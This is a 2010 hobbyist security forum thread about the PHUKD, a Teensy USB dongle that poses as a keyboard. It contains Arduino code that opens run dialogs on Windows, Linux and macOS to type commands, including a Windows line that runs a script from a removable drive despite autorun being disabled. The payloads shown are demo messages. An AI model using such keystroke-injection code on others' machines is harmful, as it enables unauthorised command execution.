Jump to content

Phukd

haxwithaxe

By haxwithaxe
in Community Projects

 Share

Recommended Posts

haxwithaxe Newbie

haxwithaxe

Posted
Posted (edited)

DUCKY CODE RELEASE TODAY!!!!!! YIPPY!!!!!! ^u^

>:( no code yet sorry

EDIT: I would encourage people to transition to the usbducky section of the forum with any further suggestions and questions. If what Darren is putting out is better than this I will not be updating this thread with the code.

This is the first thread here on the phukd? really?

If you are looking for the USBDucky then hold on it's on it's way but this ain't it.

Darren has been working for about a year on the USBDucky and it will certainly be good. So get your teensy and some other parts I'm not comfortable talking about ('cause I'm not sure Darren will use them) and play with my and Irongeek's code but keep an eye out for the USBDucky on Hak5 IT WILL BE GOOD. The conversation on #hak5 included the words "plug and play" and "turnkey" in reference to the USBDucky, so if this ain't good it'll at least be easy to get up and running, but after a year of work I can't imagine it won't be anything but amazing.

So for those of you who don't know the PHUKD is this doohhicky --> http://www.irongeek.com/i.php?page=securit...eystroke-dongle

Some parts you might consider getting regardless of what Darren does:

- LEDs for feedback

- microSD slot (the breakout boards are just as tiny so unless you are a huge soldering noob go for the slot by itself)

- USB adapter for the miniB port (miniB to regularA double-male)

- a 2 position switch to arm it and disarm it

I suggest the microSD slot because I will be adding support for using the teensy as a mass storage device or running code on the teensy from the sdcard if Darren hasn't when he releases the Ducky.

Here is one thing left out of the article:

* in the arduino gui goto: sketch > add file and add all the files in arduino-xxxx/hardware/teensy/cores/tensy_hid/

I have not tested if all the files are needed but I have bigger fish to fry at the moment.

Goto: Tools > Board > <your teensy model> (USB Keyboard/Mouse)

Here are some changes i made to the original example.

As is this will just blink (you won't see it since it happens so fast) you need to put a call to payload function in the place the comments say too or you can uncomment one of mine.

EDIT: Added some more functions and update some info.

EDIT (3/31/2010 12:22): Oh holy shit apple sucks big hairy donkey balls no run dialog and funny keys >:( Working on the AppleCommandRun funtion what is below is the best i can do right now i have no mac (just a VM) so i was lucky enough to get HaDak from #hak5 to find the keycode for the apple key. I need to do some getting payed fooling around though so I can't test it today.

EDIT (4/1/2010): fix path for Apple payload's text edit demo

EDIT (4/2/2010): Omi has fixed the AppleCommandRun and i am going to buy a copy of snowlepord to test with as soon as i get paid.

 
/* The following is Irongeek's code (with many additions and subtractions by haxwithaxe and Omidenchin(aka Omi)) to do simple keyboard/mouse functions with the Teensy, including 
 something like U3 functionality that will work even if autorun is disabled.
 NOTE: haxwithaxe has removed the DIPSwitch code because he doesn't have a dipswitch to play with, but it can be just as easily put back in and used to
       select the payload. It is strongly recommended that you go to Irongeek's site and not only look at his code but watch the acompanying video right
       above the code example

 Original Source: http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
 Also see his updated source with some of my stuff in it. 

 To learn more about Teensyduino see:
 http://www.pjrc.com/teensy/teensyduino.html
 Look in arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_api.h for key definitions
 Edit arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_private.h to change USB Vendor and Product ID

 To learn more about keboard shortcuts
 Apple: http://support.apple.com/kb/ht1343
 Windows: http://support.microsoft.com/kb/126449
 Gnome/KDE: http://www.novell.com/coolsolutions/tip/2289.html
 please add more to this list if you can think of any window managers that have default keyboard shortcuts
*/

int ledPin = 6; // LED connected to digital pin 11 for teensy2 and pin 6 for teensy2++

// The setup() method runs once, when the sketch starts
void setup() { 
  // initialize the digital pin as an output:
  pinMode(ledPin, OUTPUT);  
}

// the loop() method runs over and over again,
// as long as the Arduino has power
void loop() {
  delay(1000); // wait for host to listen
  digitalWrite(ledPin, HIGH); // set the LED on
  // os detection and payload go here
  //LinuxPayload();
  //WindowsPayload();
  //ApplePayload();
  digitalWrite(ledPin, LOW); // set the LED off
  delay(15000); //keeps commands from being sent one after the other too fast
}

void LinuxPayload(){
  GnomeKDECommandRun("xterm -e \"echo kill all humans! ... 01010001 &gt; pwnd &amp;&amp; cat pwnd -\"");
  // run drive finding cmd to be ripped from casper hopefully it'll be a "one liner"
  // i dont exist yet T_T
  // also waiting for Darren's USBDucky example code to see if he has gotten around doing this
}

void WindowsPayload(){
  WindowsCommandRun("notepad.exe");
  delay(1000);
  Keyboard.print("Irongeek was here!!! }:)");

  WindowsCommandRun("cmd /c for /F %i in ('WMIC logicaldisk where \"DriveType=2\" list brief ^| find \"MYDISK\"') do %i\\myscript.exe");
}

void ApplePayload(){
  AppleCommandRun("/Applications/TextEdit.app/Contents/MacOS/TextEdit"); // open text editor
  delay(1000);
  Keyboard.print("hax was here!!! }:)"); // type message
  // or
  AppleCommandRun("echo kill all humans! ... 01010001"); // print a message directly in the terminal
  // run drive finding command
  // i don't own a mac so please feel free to make something up for me
  // also waiting for Darren's USBDucky example code to see if he has gotten around doing this
}

void WindowsCommandRun(char *SomeCommand){
  KeyCombo(MODIFIERKEY_GUI,KEY_R); // open run dialog
  delay(1500); // wait for it to open
  Keyboard.print(SomeCommand); // enter some command
  KeyPress(KEY_ENTER); // exec some command
}

void GnomeKDECommandRun(char *SomeCommand){
  KeyCombo(MODIFIERKEY_ALT,KEY_F2); // open run dialog
  delay(1500); // wait for it to open
  Keyboard.print(SomeCommand); // enter some command
  KeyPress(KEY_ENTER); // exec some command
}

// this is now works
void AppleCommandRun(char *SomeCommand){
  KeyCombo(MODIFIERKEY_GUI,KEY_SPACE); // "apple" aka command key, space key -- open spotlight
  delay(1500); // wanna make this as short as possible
  Keyboard.print("Terminal.app"); // type Terminal.app
  delay(1000); // wanna make this as short as possible
  KeyPress(KEY_ENTER); // press enter to run xterm
  delay(1500); // wanna make this as short as possible
  Keyboard.print(SomeCommand); // enter command
  KeyPress(KEY_ENTER); // run command
}

void KeyPress(int SomeKey) {
  Keyboard.set_key1(SomeKey); // set some key
  Keyboard.send_now(); // "press" some key
  // clear some key
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void KeyCombo(int ModKey,int SomeKey) {
  Keyboard.set_modifier(ModKey); //set one or more modifier keys
  Keyboard.set_key1(SomeKey); // set regular key
  Keyboard.send_now(); // send strokes
  // clear keys
  Keyboard.set_modifier(0); // prep release of control keys
  Keyboard.set_key1(0); // have to do this to keep it from hitting key multiple times.
  Keyboard.send_now();
}

Edited by haxwithaxe
Link to comment
Share on other sites
Dаrren Kitchen Newbie

Dаrren Kitchen

Posted
Posted

I've updated my site, and the code:

http://www.irongeek.com/i.php?page=securit...eystroke-dongle

I think I need to add some of your functions, just to make coding keystroke easier. I've made a function to repeat keystrokes you have to hit many times in a roll, like tab. I've also added better code for checking the photoresistor and doing something based on light, and a timer function so you can leave the PHUKD behind to wait for someone to login.

Link to comment
Share on other sites
haxwithaxe Newbie

haxwithaxe

Posted
  • Author
Posted (edited) 
AppleCommandRun("/Applications/TextEdit.app/Contents/TextEdit");

Isn't it /Applications/TextEdit.app/Contents/MacOS/TextEdit ?

It could well be. I only have a copy of deadmoo to work from but I have a mac owner working with me now so I'll see tonight I hope.

Just checked with the mac users on #hak5 and they confirmed my path was wrong

Edited by haxwithaxe
Link to comment
Share on other sites
  • 2 weeks later...
Netshroud Newbie

Netshroud

Posted
Posted

BTW, instead of:

/Path/To/Application.app/Contents/MacOS/Application

you can do

open -a /Path/To/Application.app

Which is easier for some application where the name of the .app bundle is not the same names at the application itself.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...